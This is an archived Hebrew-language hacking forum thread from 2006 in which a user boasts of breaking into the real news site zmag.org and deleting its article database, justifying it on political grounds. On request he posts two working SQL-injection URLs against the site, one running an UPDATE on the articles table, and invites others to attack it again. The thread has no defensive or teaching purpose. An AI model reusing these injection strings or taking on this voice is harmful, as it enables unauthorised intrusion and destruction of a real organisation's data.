Logo

רד-בורד: ארכיון

ראשי > אבטחת מידע > נפרץ zmag אתר ידיעות אירני

06/08/2006 04:51:53 zokri
http://www.zmag.org
תנסו להכנס שם לכל האתרי משנה של האתר הזה ותנסו להכנס לתוך כל מיני קישורים שם (אלו שפועלים ע"י הקובץ: .cfm נפלו הכל נפל מערכת ההרשמות הכל)
הרצת שאילתה גרמה לקריסת המערכת(יש שם אלפי ידיעות) ד"א ישבתי על זה 3 שעות, זה פאקינג java database!!!(JDBC driver) וזה פקודות מיוחדת איזה עצבים הייתי צריך להכנס לאתר של של adobe וללמוד טיפה coldfusion (אל תשאלו מה הקשר גם אני לא יודע)
http://download.macromedia.com/pub/coldfusion/documentation/cfmx_getting_started.pdf
דאמט היה אחד המעצבנים טוב נו הלך עוד אתר אנטישמי שפירסם ידיעות על ישראל שכביכול היא פושעת מלחמה וכו’...
ד"א אם אתם רוצים תנסו להכנס:
http://www.zmag.org/weluser.htm
כנסו לRecent Articles
ואני הרוג מעיפות לילה טוב נדבר מחר.
איזה כיף עכשיו גיליתי שהפלתי להם את כל מערכת הדאטא בייס :)


[ההודעה נערכה על-ידי zokri ב-06/08/2006 04:54:05]

[ההודעה נערכה על-ידי zokri ב-06/08/2006 04:55:20]

[ההודעה נערכה על-ידי zokri ב-06/08/2006 05:00:25][ההודעה נערכה על-ידי zokri ב-06/08/2006 05:10:12]
06/08/2006 06:00:40 zokri
עריכה: רציתי לשחרר את הקוד של הסינקס אבל עזבו אני רוצה לעשות עוד משהו, אבל אל תדאגו אם אתם רואים שזה עובד זה בגלל שלוקח לדאטא בייס לעלות אחרי שעה ואני יושן :)
טוב בכל זאת אם זה עולה יש לכם אתגר להפיל אותו נראה אותכם :][ההודעה נערכה על-ידי zokri ב-06/08/2006 06:13:10]
06/08/2006 06:46:19 zokri
אהה איזה נחמד כנסו שניה פה:
http://www.zmag.org מחקתי להם database
קבלו נסו להכנס לRecent Articles
תראו הכל ריק! :)
06/08/2006 09:30:48 Cyber Knight
הם שיחזרו את האתר........

אתה יכול לפרסם POC בבקשה אחי ?
06/08/2006 12:14:08 zokri
טוב יאללה נשחרר,
קוד להרצת שאילתות ניתן לכתוב ככה:
http://www.zmag.org/content/addressarticle.cfm?ItemID=9052+UPDATE+ContentItems+SET+ItemDisplayTitle=223+WHERE+ItemID=9052
קוד לתקיעת המסד:
http://www.zmag.org/content/showarticle.cfm?ItemID=9052;+UPDATE+ci+SET+ci.ItemTitle=[’sdfsfdsdfsfd’]+WHERE+ci.ItemID=9052
יום טוב.
06/08/2006 20:42:07 Acid-Burn
בעעעע זה הבסיס נתונים ההבכי מגעיל שיש בעעעעעעעעעעעעעעע
עמודים: 1